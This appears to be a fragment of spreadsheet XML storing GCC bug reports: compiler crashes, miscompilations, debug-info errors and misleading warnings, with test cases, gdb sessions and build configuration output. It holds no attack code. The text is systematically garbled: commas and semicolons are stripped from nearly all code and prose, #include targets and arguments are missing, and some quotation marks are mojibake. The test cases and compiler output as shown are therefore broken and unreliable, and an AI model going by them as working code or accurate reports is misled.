+FAIL: gdb.cp/namespace.exp: print G::XgX                                                                                                                              
+FAIL: gdb.cp/namespace.exp: print cXOtherFile                                                                                                                         
+FAIL: gdb.cp/namespace.exp: print XOtherFile                                                                                                                          
 Running ../../../gdb/testsuite/gdb.cp/overload.exp ...                                                                                                                
 PASS: gdb.cp/overload.exp: up from marker1                                                                                                                            
 PASS: gdb.cp/overload.exp: print foo_instance1</t>
  </si>
  <si>
    <t>hubicka</t>
  </si>
  <si>
    <t>GCC-47213</t>
  </si>
  <si>
    <t>ICE: SIGSEGV in determine_visibility (decl2.c:2076) with -fvisibility-ms-compat</t>
  </si>
  <si>
    <t>Created attachment 22925
reduced testcase
Compiler output:
$ gcc -fvisibility-ms-compat pr47213.C
==1382== Invalid read of size 2
==1382==    at 0x5B2EAF: determine_visibility (decl2.c:2076)
==1382==    by 0x534F5B: cp_finish_decl (decl.c:6067)
==1382==    by 0x677DD9: pushdecl_top_level_1 (name-lookup.c:3649)
==1382==    by 0x677E24: pushdecl_top_level_and_finish (name-lookup.c:3677)
==1382==    by 0x5F1282: get_tinfo_decl (rtti.c:441)
==1382==    by 0x5F14C5: get_tinfo_ptr (rtti.c:458)
==1382==    by 0x5F19E2: get_typeid (rtti.c:493)
==1382==    by 0x56106A: tsubst_copy_and_build (pt.c:13215)
==1382==    by 0x554C18: tsubst_expr (pt.c:12379)
==1382==    by 0x5559A8: tsubst_expr (pt.c:11955)
==1382==    by 0x554CC8: tsubst_expr (pt.c:12120)
==1382==    by 0x581C41: instantiate_decl (pt.c:17379)
==1382==    by 0x589053: instantiate_pending_templates (pt.c:17476)
==1382==    by 0x5B7321: cp_write_global_declarations (decl2.c:3679)
==1382==    by 0xA245D5: toplev_main (toplev.c:591)
==1382==    by 0x6369BBC: (below main) (in /lib64/libc-2.11.2.so)
==1382==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==1382== 
pr47213.C: In instantiation of 'void bar() [with T = int()]':
pr47213.C:12:19:   instantiated from here
pr47213.C:6:3: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r168552 - crash
4.3.5 4.4.5 4.5.2 - crash
4.2.4 - doesn't know -fvisibility-ms-compat</t>
  </si>
  <si>
    <t>GCC-23589</t>
  </si>
  <si>
    <t>internal compiler error: in rest_of_handle_final at toplev.c:2067</t>
  </si>
  <si>
    <t>This code works with the previous cygwin compiler that was based on gcc 3.3.3.
Thank you for looking at this.
gcc -v gives:
Reading specs from /usr/lib/gcc/i686-pc-cygwin/3.4.4/specs
Configured with: /gcc/gcc-3.4.4/gcc-3.4.4-1/configure --verbose --prefix=/usr
--exec-prefix=/usr --sysconfdir=/etc --libdir=/usr/lib --libexecdir=/usr/lib
--mandir=/usr/share/man --infodir=/usr/share/info
--enable-languages=cadac++df77javaobjc --enable-nls
--without-included-gettext --enable-version-specific-runtime-libs --without-x
--enable-libgcj --disable-java-awt --with-system-zlib --enable-interpreter
--disable-libgcj-debug --enable-threads=posix --enable-java-gc=boehm
--disable-win32-registry --enable-sjlj-exceptions --enable-hash-synchronization
--enable-libstdcxx-debug : (reconfigured)
Thread model: posix
gcc version 3.4.4 (cygming special) (gdc 0.12 using dmd 0.125)
The output when compiling with gcc -c t.cpp:
t.cpp: In constructor `Point::Point(pointIterator pointIterator) [with
pointIterator = __gnu_cxx::__normal_iterator&lt;Point* std::vector&lt;Point
std::allocator &gt; &gt;]':
t.cpp:22:   instantiated from `Point::Point(pointIterator pointIterator) [with
pointIterator = __gnu_cxx::__normal_iterator&lt;Point* std::vector&lt;Point
std::allocator &gt; &gt;]'
t.cpp:34:   instantiated from here
t.cpp:22: internal compiler error: in rest_of_handle_final at toplev.c:2067
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Here is the source of the program (37 lines):
#include 
#include 
// This is from an include file in a library.  If OTF_IMEX is instead
// defined to be __declspec(dllexport) then it compiles but that
// should only be done in the compliation of the library not where it
// is included.
#  define OTF_IMEX __declspec(dllimport)
class OTF_IMEX Point {
        float data_[3]
        friend inline std::ostream
public:
        Point()
        Point(float x float y float z)
        template 
                Point(pointIterator ptStart pointIterator ptStop)
}
template 
Point::Point(pointIterator ptStart pointIterator ptStop)
{
        // construct a point that is the average of the given points
}
// back to your normal program that included the above
int
main()
{
        std::vector points
        points.push_back(Point(0 0 0))
        points.push_back(Point(1 1 1))
        Point pt(points.begin() points.end())
        std::cout &lt;&lt; average point:  &lt;&lt; pt &lt;&lt; '\n'
        return 0
}</t>
  </si>
  <si>
    <t>gregc</t>
  </si>
  <si>
    <t>GCC-9078</t>
  </si>
  <si>
    <t>libffi</t>
  </si>
  <si>
    <t>libffi: problems with uint8 on powerpc</t>
  </si>
  <si>
    <t>[ Reported to the Debian BTS as report #173074.
  Please CC 173074@bugs.debian.org on replies.
  Log of report can be found at http://bugs.debian.org/173074 ]
[ category libgcj as there is no explicit libffi category]
ffi_type_uint8 and other arguments shorter than one word are
not passed in correctly to the function called by ffi_call.
Also returns values are not passed correctly.  For example instead of
finding the returned byte value where the pointer points to it is found
at an offset of 3 from the pointer.
This is related to the fact that the powerpc is a big endian machine and
somewhere bytes need to be moved.
I have included code and output I get on my powerpc machine.
Thanks
David
-----
#include 
#include 
unsigned char identity(unsigned char c) {
  printf(identity: %d\n c)
  return c
}
int main(void) {
  ffi_cif cif
  ffi_type *args[1]
  void *values[1]
  int b
  unsigned char result
  int i
  args[0] = 
  /*
   * args[0] =   - if this type is specified
   * function always receives 0.
   */
  b = 24
  values[0] = 
  if (ffi_prep_cif(&amp;cif FFI_DEFAULT_ABI 1
		   &amp;ffi_type_uint8 args) != FFI_OK) {
    printf(error\n)
    return 1
  }
  ffi_call(
  printf(at result: %d\n result)
  printf(at result + 3: %d\n *(
  /*
  for (i = 0 i &lt; sizeof(result) i++) {
    printf(byte %d = %d\n i *((unsigned char *) 
  }
  */
  return 0
}
-----
output:
identity: 24
at result: 0
at result + 3: 24
-----
David
Release:
3.2.1 (Debian) (Debian unstable)
Environment:
System: Debian GNU/Linux (unstable)
Architecture: i686
host: i386-linux</t>
  </si>
  <si>
    <t>jsturm</t>
  </si>
  <si>
    <t>173074</t>
  </si>
  <si>
    <t>GCC-44731</t>
  </si>
  <si>
    <t>[4.5 Regression] Return value optimization produces inaccurate debug info</t>
  </si>
  <si>
    <t>Source file (no preprocessing required): (note I made it C-compatible so I could see if the bug is present in the C compiler as well the answer being no for reasons that will become obvious immediately)
--------------------------------------------------------------------------------
struct st{
       int n
}
struct st f(struct st x)
{
       struct st z
       z=x
       z.n++
       return z
}
int main()
{
    struct st c
    c.n=1234
    f(c)
    return 0
}
--------------------------------------------------------------------------------
Terminal session:
--------------------------------------------------------------------------------
brian@bbi5291-laptop:~/programs/Other$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/i686-pc-linux-gnu/4.5.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: ./configure
Thread model: posix
gcc version 4.5.0 (GCC) 
brian@bbi5291-laptop:~/programs/Other$ g++ -g bug.c
brian@bbi5291-laptop:~/programs/Other$ gdb a.out
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as i486-linux-gnu...
(gdb) break 8
Breakpoint 1 at 0x80483d2: file bug.c line 8.
(gdb) run
Starting program: /home/brian/programs/Other/a.out 
Breakpoint 1 f (x={n = 1234}) at bug.c:8
8	       z.n++
Current language:  auto currently c++
(gdb) print z.n
$1 = 2424820
(gdb) q
The program is running.  Exit anyway? (y or n) y
brian@bbi5291-laptop:~/programs/Other$ g++ -g -fno-elide-constructors bug.c
brian@bbi5291-laptop:~/programs/Other$ gdb a.out
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as i486-linux-gnu...
(gdb) break 8
Breakpoint 1 at 0x80483e0: file bug.c line 8.
(gdb) run
Starting program: /home/brian/programs/Other/a.out 
Breakpoint 1 f (x={n = 1234}) at bug.c:8
8	       z.n++
Current language:  auto currently c++
(gdb) print z.n
$1 = 1234
(gdb) q
The program is running.  Exit anyway? (y or n) y
brian@bbi5291-laptop:~/programs/Other$ 
--------------------------------------------------------------------------------
It is evident to me from these test runs that a bug in the return value optimization is causing the wrong address for the variable z (since this is presumably elided altogether when the optimization is used) to be reported in the debug information. I first noticed this bug in g++ 4.4.1 and installed g++ 4.5.0 and found that it was there too it does not occur in g++ 4.3.4 or earlier.</t>
  </si>
  <si>
    <t>bbi5291</t>
  </si>
  <si>
    <t>GCC-14049</t>
  </si>
  <si>
    <t>[4.0 regression] bad debug block info dwarf-2 c++</t>
  </si>
  <si>
    <t>Here is a small C++ function.
  int foobar (int x_1)
  {
    static int i_1
    char c_1
    marker1 ()
    c_1 = x_1
    i_1++
    return 0
  }
I compile with gcc -S -gdwarf-2.
With gcc HEAD2 2004-02-01 15:37:18 UTC the block info is fine:
  .LBB2:
  .LBB3:
    .loc 1 10 0
    call _Z7marker1v
    .loc 1 11 0
    movl 8(%ebp) %eax
    movb %al -1(%ebp)
    .loc 1 12 0
    incl _ZZ6foobariE3i_1
    .loc 1 14 0
     movl $0 %eax
  .LBE3:
  .LBE2:
    .loc 1 15 0
    leave
    ret
With gcc tree-ssa-200206190-branch 2004-02-05 12:45:13 UTC the call to marker1
is outside the block for the function:
    .loc 1 10 0
    call _Z7marker1v
  .LBB2:
  .LBB3:
    .loc 1 11 0
    movl 8(%ebp) %eax
    movb %al -1(%ebp)
    .loc 1 12 0
    movl __ZZ6foobariE3i_1 %eax
    incl %eax
    movl %eax __ZZ6foobariE3i_1
    .loc 1 14 0
    movl $0 %eax
  .LBE3:
  .LBE2:
    .loc 1 15 0
    leave
    ret
Later on gcc emits a DW_TAG_lexical_block for LBB3/LBE3.  With gcc
tree-ssa-branch this does not cover the call to marker1.  Here is what readelf
-w says:
  # gcc HEAD
  DW_TAG_subprogram foobar
  DW_TAG_formal_parameter x_1
  DW_TAG_lexical_block 0x8048340 0x8048356
  DW_TAG_variable i_1
  DW_TAG_variable c_1
  # gcc tree-ssa
  DW_TAG_subprogram foobar
  DW_TAG_formal_paramater x_1
  DW_TAG_lexical_block 0x8048345 0x804835b
  DW_TAG_variable i_1
  DW_TAG_variable c_1
So the local variables i_1 and c_1 are inside the lexical block and the lexical
block does not cover the first statement of foobar.
So if I do this:
  (gdb) break foobar
  (gdb) run
  (gdb) info locals
Or this:
  (gdb) break marker1
  (gdb) run
  (gdb) up
  (gdb) info locals
... then gdb cannot find the locals.</t>
  </si>
  <si>
    <t>mec.gnu</t>
  </si>
  <si>
    <t>GCC-18497</t>
  </si>
  <si>
    <t>Not rejecting non template call to template (non-dependent) function until instantiation time</t>
  </si>
  <si>
    <t>The code in question:
==== begin ====
struct C
{
 template  void f() {}
}
template  void ff()
{
  C c
  c.f()
}
==== end ====
g++ 3.3 (version 3.3.5 Debian 1:3.3.5-2) cannot compile the above code. With
command line g++-3.3 -c -o a.o a.cc it displays the following error messages:
a.cc: In function `void ff()':
a.cc:9: error: parse error before `&gt;' token
The above code compiles fine in g++ 3.4 (version 3.4.2 Debian 3.4.2-3).
What interesting is if the member function and the free function above have same
name g++ 3.3 compiles the code without problem. And the code generated seems to
be fine.</t>
  </si>
  <si>
    <t>zhaojiangbin</t>
  </si>
  <si>
    <t>GCC-83047</t>
  </si>
  <si>
    <t>[8 regression] glibc/crypt/crypt_util.c gets miscompiled</t>
  </si>
  <si>
    <t>Glibc's crypt/crypt_util.c gets miscopmiled with gcc-8:
markus@x4 ~ % LD_PRELOAD=/var/tmp/glibc-build/crypt/libcrypt.so gdb /var/tmp/glibc-build/crypt/badsalttest
Reading symbols from /var/tmp/glibc-build/crypt/badsalttest...done.                      
(gdb) run                                   
Starting program: /home/markus/tmp/glibc-build/crypt/badsalttest                         
[New process 1418]                          
Thread 2.1 badsalttest received signal SIGSEGV Segmentation fault.                    
[Switching to process 1418]                 
0x00007ffff7b9ecd9 in _ufc_setup_salt_r (s=s@entry=0x7ffff7ff3fff * __data=__data@entry=0x7ffff7db2160 ) at crypt_util.c:612                                       
612       s0 = s[0]                        
(gdb) bt                                    
#0  0x00007ffff7b9ecd9 in _ufc_setup_salt_r (s=s@entry=0x7ffff7ff3fff * __data=__data@entry=0x7ffff7db2160 ) at crypt_util.c:612                                   
#1  0x00007ffff7b9bf2f in __crypt_r (key=0x401e32 end of page salt=0x7ffff7ff3fff * data=0x7ffff7db2160 ) at crypt-entry.c:109                                  
#2  0x00000000004012b2 in do_test () at badsalttest.c:66                                 
#3  0x0000000000401c1f in run_test_function (config=0x7fffffffe240 config=0x7fffffffe240 argv=0x7fffffffe378 argc=) at support_test_main.c:158                   
#4  support_test_main (argc= argv=0x7fffffffe378 config=config@entry=0x7fffffffe240) at support_test_main.c:349                                                   
#5  0x00000000004010d9 in main (argc= argv=) at ../support/test-driver.c:164</t>
  </si>
  <si>
    <t>trippels</t>
  </si>
  <si>
    <t>GCC-13679</t>
  </si>
  <si>
    <t>ICE in fortran/trans-types.c:584</t>
  </si>
  <si>
    <t>gfortran from January 14 crashes on the following code:
--- begin code
module linebufmod
implicit none
private
public linebuf linebuf_add
type linebuf
  character(len=80) dimension(:) pointer :: data=&gt;NULL()
end type linebuf
contains
subroutine linebuf_add (buf)
  type(linebuf) intent(inout) :: buf
end subroutine linebuf_add
end module linebufmod
--- end code
~/tmp&gt;gfortran -v -c bug1.f90
Reading specs from
/afs/mpa/data/martin/ugcc-ssa/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/specs
Configured with: /scratch/gcc-ssa/configure
--prefix=/afs/mpa/data/martin/ugcc-ssa --enable-languages=c++f95
Thread model: posix
gcc version 3.5-tree-ssa 20040114 (merged 20040102)
 /afs/mpa/data/martin/ugcc-ssa/libexec/gcc/i686-pc-linux-gnu/3.5-tree-ssa/f951
bug1.f90 -quiet -dumpbase bug1.f90 -mtune=pentiumpro -auxbase bug1 -version -o
/tmp/ccLAIftD.s
GNU F95 version 3.5-tree-ssa 20040114 (merged 20040102) (i686-pc-linux-gnu)
        compiled by GNU C version 3.5-tree-ssa 20040114 (merged 20040102).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
bug1.f90:0: internal compiler error: in gfc_get_dtype_cst at
fortran/trans-types.c:584
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-44092</t>
  </si>
  <si>
    <t>Undefined Symbol: std::basic_string</t>
  </si>
  <si>
    <t>If I compile a short Programm with g++ and I declare a STL-String (only declare!) than it is ok (g++ -c -Wall Progname.c).
But if I link the same programm with g++ -o Progname Progname.o than I get an linker error:
ld: 0711-317 ERROR: Undefined symbol: .std::basic_string&lt;char std::char_traits&lt;
char&gt; std::allocator &gt;::basic_string()
ld: 0711-317 ERROR: Undefined symbol: .std::basic_string&lt;char std::char_traits&lt;
char&gt; std::allocator &gt;::~basic_string()
If I use some other STL-Funtions as e.g. maps vectors I get no errors.
I also have tried the gcc-4.2.0 but the same problem (as with -&gt; gcc 4.0.0).
Even a linker option -lstdc++ does not help.</t>
  </si>
  <si>
    <t>stefanwin</t>
  </si>
  <si>
    <t>GCC-47197</t>
  </si>
  <si>
    <t>ICE in gimplify_expr at gimplify.c:7153 on AltiVec code (vec_dst)</t>
  </si>
  <si>
    <t>$ cat alti_crash.c 
#include 
void func(unsigned char *buf unsigned len)
{
        vec_dst(buf (len &gt;= 256 ? 0 : len) | 512 2)
}
$ powerpc-linux-gnu-gcc -maltivec -c alti_crash.c 
alti_crash.c: In function 'func':
alti_crash.c:5:20: internal compiler error: in gimplify_expr at gimplify.c:7153
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ powerpc-linux-gnu-gcc --version -v
Using built-in specs.
COLLECT_GCC=/usr/i686-pc-linux-gnu/powerpc-linux-gnu/gcc-bin/4.5.2/powerpc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/powerpc-linux-gnu/4.5.2/lto-wrapper
powerpc-linux-gnu-gcc (Gentoo 4.5.2 p1.0 pie-0.4.5) 4.5.2
Copyright (C) 2010 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Target: powerpc-linux-gnu
Configured with: /var/tmp/portage/cross-powerpc-linux-gnu/gcc-4.5.2/work/gcc-4.5.2/configure --prefix=/usr --bindir=/usr/i686-pc-linux-gnu/powerpc-linux-gnu/gcc-bin/4.5.2 --includedir=/usr/lib/gcc/powerpc-linux-gnu/4.5.2/include --datadir=/usr/share/gcc-data/powerpc-linux-gnu/4.5.2 --mandir=/usr/share/gcc-data/powerpc-linux-gnu/4.5.2/man --infodir=/usr/share/gcc-data/powerpc-linux-gnu/4.5.2/info --with-gxx-include-dir=/usr/lib/gcc/powerpc-linux-gnu/4.5.2/include/g++-v4 --host=i686-pc-linux-gnu --target=powerpc-linux-gnu --build=i686-pc-linux-gnu --disable-altivec --disable-fixed-point --without-ppl --without-cloog --disable-ppl-version-check --disable-lto --enable-nls --without-included-gettext --with-system-zlib --disable-werror --enable-secureplt --disable-multilib --enable-libmudflap --disable-libssp --enable-libgomp --enable-cld --with-python-dir=/share/gcc-data/powerpc-linux-gnu/4.5.2/python --enable-checking=release --disable-libgcj --enable-languages=c --with-sysroot=/usr/powerpc-linux-gnu --disable-bootstrap --enable-__cxa_atexit --enable-clocale=gnu --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo 4.5.2 p1.0 pie-0.4.5'
Thread model: posix
gcc version 4.5.2 (Gentoo 4.5.2 p1.0 pie-0.4.5) 
COLLECT_GCC_OPTIONS='-fversion' '-v'
 /usr/libexec/gcc/powerpc-linux-gnu/4.5.2/cc1 -quiet -v -D__unix__ -D__gnu_linux__ -D__linux__ -Dunix -D__unix -Dlinux -D__linux -Asystem=linux -Asystem=unix -Asystem=posix help-dummy -D_FORTIFY_SOURCE=2 -msecure-plt -quiet -dumpbase help-dummy -auxbase help-dummy -version -fversion -o /tmp/ccujbTX3.s
GNU C (Gentoo 4.5.2 p1.0 pie-0.4.5) version 4.5.2 (powerpc-linux-gnu)
        compiled by GNU C version 4.4.4 GMP version 4.3.2 MPFR version 2.4.2-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
COLLECT_GCC_OPTIONS='-fversion' '-v'
 /usr/libexec/gcc/powerpc-linux-gnu/as -mppc -many -V -Qy --version -o /tmp/cccIfFZe.o /tmp/ccujbTX3.s
GNU assembler version 2.21 (powerpc-linux-gnu) using BFD version (GNU Binutils) 2.21
GNU assembler (GNU Binutils) 2.21
Copyright 2010 Free Software Foundation Inc.
This program is free software you may redistribute it under the terms of
the GNU General Public License version 3 or later.
This program has absolutely no warranty.
This assembler was configured for a target of `powerpc-linux-gnu'.
COMPILER_PATH=/usr/libexec/gcc/powerpc-linux-gnu/4.5.2/:/usr/libexec/gcc/powerpc-linux-gnu/4.5.2/:/usr/libexec/gcc/powerpc-linux-gnu/:/usr/lib/gcc/powerpc-linux-gnu/4.5.2/:/usr/lib/gcc/powerpc-linux-gnu/:/usr/lib/gcc/powerpc-linux-gnu/4.5.2/../../../../powerpc-linux-gnu/bin/
LIBRARY_PATH=/usr/lib/gcc/powerpc-linux-gnu/4.5.2/:/usr/lib/gcc/powerpc-linux-gnu/4.5.2/../../../../powerpc-linux-gnu/lib/:/usr/powerpc-linux-gnu/lib/:/usr/powerpc-linux-gnu/usr/lib/
COLLECT_GCC_OPTIONS='-fversion' '-v'
 /usr/libexec/gcc/powerpc-linux-gnu/4.5.2/collect2 --sysroot=/usr/powerpc-linux-gnu --eh-frame-hdr -V -Qy -m elf32ppclinux -dynamic-linker /lib/ld.so.1 --version /usr/lib/gcc/powerpc-linux-gnu/4.5.2/../../../../powerpc-linux-gnu/lib/crt1.o /usr/lib/gcc/powerpc-linux-gnu/4.5.2/../../../../powerpc-linux-gnu/lib/crti.o /usr/lib/gcc/powerpc-linux-gnu/4.5.2/crtbegin.o -L/usr/lib/gcc/powerpc-linux-gnu/4.5.2 -L/usr/lib/gcc/powerpc-linux-gnu/4.5.2/../../../../powerpc-linux-gnu/lib -L/usr/powerpc-linux-gnu/lib -L/usr/powerpc-linux-gnu/usr/lib /tmp/cccIfFZe.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/powerpc-linux-gnu/4.5.2/crtend.o /usr/lib/gcc/powerpc-linux-gnu/4.5.2/../../../../powerpc-linux-gnu/lib/crtn.o
GNU ld (GNU Binutils) 2.21
  Supported emulations:
   elf32ppclinux
   elf32ppc
   elf32ppcsim
   elf64ppc
GNU ld (GNU Binutils) 2.21
Copyright 2010 Free Software Foundation Inc.
This program is free software you may redistribute it under the terms of
the GNU General Public License version 3 or (at your option) a later version.
This program has absolutely no warranty.
I know i know It not vanilla gcc but otherwise i can not get a vanilla cross-compiler that fast maybe someone can confirm...
Greetings
Jan</t>
  </si>
  <si>
    <t>kaffeemonster</t>
  </si>
  <si>
    <t>GCC-37988</t>
  </si>
  <si>
    <t>Edit descriptor checking (compile time) for T)</t>
  </si>
  <si>
    <t>Found at http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/1086da75f7aed669
The following program is invalid as the (Holerith) string has 22 and not 21 characters. Thus the format is ...T).
gfortran accepts the program at compile time but rejects it at run time with:
Fortran runtime error: Positive width required in format
EVEL ='F7.4 21H ONE-SIDED AT THE LEFT)
                                       ^
g95 and NAG f95 detect the problem already at compile time - gfortran should do the same.
        WRITE(08001) SIG
        WRITE(68001) SIG
 8001 FORMAT(//'     SIGNIFICANCE LEVEL ='F7.4 21H ONE-SIDED AT THE LEFT)
end</t>
  </si>
  <si>
    <t>GCC-29458</t>
  </si>
  <si>
    <t>Spurious -Wuninitialized warning for implied do-loop counter</t>
  </si>
  <si>
    <t>$ cat a.f90
  integer :: n i
  n = 5
  n = sum((/(ii=1n)/))
  end
$ gfortran -O -Wall a.f90
a.f90: In function â€˜MAIN__â€™:
a.f90:3: warning: â€˜iâ€™ is used uninitialized in this function</t>
  </si>
  <si>
    <t>dfranke</t>
  </si>
  <si>
    <t>GCC-25973</t>
  </si>
  <si>
    <t>[4.5/4.6/4.7/4.8 Regression] Wrong warning: control reaches end of non-void function</t>
  </si>
  <si>
    <t>-Wall produces warning on second function not on slightly simpler first function.
struct C {
    C() { }
    ~C() {}
}
int fine(int p) {
    C c
    if (p) {
        if (p == 4) {
            return 1
        } else {
            return 2
        }
    } else {
        return 3
    }
}
int foul(int p) {
    C c
    int pcopy = p
    if (pcopy &amp;&amp; p) {
        if (p == 4) {
            return 1
        } else {
            return 2
        }
    } else {
        return 3
    }
}
Probably a duplicate of 20624 or so.  I can't access newer version right now. Occurs in 4.0.1 4.0.0 not in 3.4.5</t>
  </si>
  <si>
    <t>stein.somers</t>
  </si>
  <si>
    <t>GCC-7991</t>
  </si>
  <si>
    <t>Exception in destructor gets caught twice</t>
  </si>
  <si>
    <t>It seems that even though the exception is caught in the destructor it gets caught again when exiting the catch block.
Release:
gcc-3.2
Environment:
RH 7.3 cygwin</t>
  </si>
  <si>
    <t>nospam</t>
  </si>
  <si>
    <t>GCC-34537</t>
  </si>
  <si>
    <t>ICE or wrong code for TRANSFER of constant string to character</t>
  </si>
  <si>
    <t>Found at http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/5a1e0cc2c7eb95cc/
   character pointer :: ptr(:)
   allocate(ptr(8))
   ptr = transfer('Sample'//achar(0)ptr) ! Causes ICE
end
gives a Floating Point Exception.</t>
  </si>
  <si>
    <t>GCC-48028</t>
  </si>
  <si>
    <t>[4.4 Regression] undeserved uninitialized variable warning regression since 4.4.2</t>
  </si>
  <si>
    <t>I have several instances of undeserved uninitialized variable warnings since upgrading from 4.4.2 to 4.4.5. Oddly they only seem to come up in 64-bit targets but I'm not sure if that's consistent. 
I have attached the pre-processed sources for two examples. One is from kerberos5 sources.</t>
  </si>
  <si>
    <t>GCC-5557</t>
  </si>
  <si>
    <t>SIGSEGV inst libstd++ / MT-context</t>
  </si>
  <si>
    <t>SIGSEGV in the C++ stdlib using STL map and class embedded string in the class template parameter. MT context.
Please consult the attached file for a complete record of the gdb session.
Release:
gcc 3.0.3 / libstd++v3
Environment:
Solaris 2.8</t>
  </si>
  <si>
    <t>agiannetti</t>
  </si>
  <si>
    <t>GCC-16706</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] ICE in finish_member_declaration at cp/semantics.c:2126</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/261051]
seen with 3.4.1 and HEAD 20040717 configured with
--enable-libstdc++-allocator=mt. ok with 3.3.4 (configured with standard
allocator). Not yet checked with the default configuration in 3.4 and HEAD.
    Matthias
$ gcc-3.4 -c oggfile.ii 
/usr/include/c++/3.4/ext/mt_allocator.h: In instantiation of
`__gnu_cxx::__mt_alloc':
/usr/include/c++/3.4/bits/allocator.h:81:   instantiated from
`std::allocator'
/usr/include/c++/3.4/bits/stl_list.h:295:   instantiated from
`std::_List_base &gt;'
/usr/include/c++/3.4/bits/stl_list.h:388:   instantiated from `std::list&lt;T
std::allocator &gt;'
/src/kde/kdesupport/taglib/toolkit/tlist.h:53:   instantiated from `TagLib::List'
/src/kde/kdesupport/taglib/toolkit/tlist.tcc:67:   instantiated from
`TagLib::List::ListPrivate::ListPrivate() [with TP = TagLib::Ogg::Page
T = TagLib::Ogg::Page*]'
/src/kde/kdesupport/taglib/toolkit/tlist.tcc:90:   instantiated from
`TagLib::List::List() [with T = TagLib::Ogg::Page*]'
/src/kde/kdesupport/taglib/ogg/oggfile.cpp:42:   instantiated from here
/usr/include/c++/3.4/ext/mt_allocator.h:120: internal compiler error: in
finish_member_declaration at cp/semantics.c:2101
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>debian-gcc</t>
  </si>
  <si>
    <t>GCC-38894</t>
  </si>
  <si>
    <t>c_f_procpointer/c_f_pointer - add missing argument checking</t>
  </si>
  <si>
    <t>Found in PR 38871. The following is invalid as C_F_FUNPTR takes function/procedure pointers as arguments.
TODO: Check also that C_F_POINTER doesn't take a type(c_ptr) as argument.
use iso_c_binding
type(c_ptr) :: fun
integer pointer :: bar
call c_f_funpointer(funbar)
end</t>
  </si>
  <si>
    <t>GCC-21667</t>
  </si>
  <si>
    <t>misleading warning about array subscription</t>
  </si>
  <si>
    <t>GCC (g++) emits a warning (-Wall) for the following code
% cat ary.C &amp;&amp; g++ -Wall ary.C                            
int main()
{
   int ary[256] = { 0 }
   return ary['a']
}
ary.C: In function 'int main()':
ary.C:4: warning: array subscript has type 'char'
The diagnostic is not helpful because the index is positive 
(all character constants from the basic character set have 
nonnegative values).  
The warning should be emitted only if the index is unkonwn (at
compile time) and has type 'char'.
-- Gaby</t>
  </si>
  <si>
    <t>GCC-42803</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] c++ compilation hang</t>
  </si>
  <si>
    <t>Compilation hangs at the following file for several hours (then I stopped it).
According to http://www.rawtherapee.com/forum/viewtopic.php?t=1719 this seems to be a regression in gcc 4.4 which is present on multiple GNU/Linux distributions all 32bit. 64bit doesn't seem to be affected.
Another discussion about this topic is hold in http://aur.archlinux.org/packages.php?ID=11186
gcc 4.3 is said to work (I didn't tested it myself because compilation of gcc takes several hours on my 32bit machine).
OS
--
Archlinux current
Tested gcc versions
--------------------
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../configure --prefix=/usr --enable-shared --enable-languages=cc++fortranobjcobj-c++ada --enable-threads=posix --mandir=/usr/share/man --infodir=/usr/share/info --enable-__cxa_atexit --disable-multilib --libdir=/usr/lib --libexecdir=/usr/lib --enable-clocale=gnu --disable-libstdcxx-pch --with-tune=generic
Thread model: posix
gcc version 4.4.2 20091208 (prerelease) (GCC)
Using built-in specs.
COLLECT_GCC=gcc-4.5
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i686-pc-linux-gnu/4.5.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: ../configure --prefix=/usr --enable-languages=cc++ --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-lto --enable-gnu-unique-object --disable-multilib --disable-libstdcxx-pch --with-tune=generic --with-system-zlib --with-ppl --with-cloog --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --disable-werror --enable-checking=release --program-suffix=-4.5 --enable-version-specific-runtime-libs
Thread model: posix
gcc version 4.5.0 20100114 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-3666</t>
  </si>
  <si>
    <t>Invalid concept-checking code.</t>
  </si>
  <si>
    <t>The __glibcpp_class_requires macro sometimes expand
to the empty string with the result that member
declarations consist of a single `'.  That's not legal
every member declaration must declare something.
An example class using this pattern is `vector' in 
stl_vector.h.
Release:
3.0</t>
  </si>
  <si>
    <t>pme</t>
  </si>
  <si>
    <t>GCC-5825</t>
  </si>
  <si>
    <t>std::__basic_file not compilable</t>
  </si>
  <si>
    <t>Not compilable std::ofstream because of missing define probably a configuration bug.
// #define WORKAROUND
#if defined (WORKAROUND)
#define  _GLIBCPP_BASIC_FILE_ENCAPSULATION 1
#endif
#include 
int main(int argc char** argv)
{
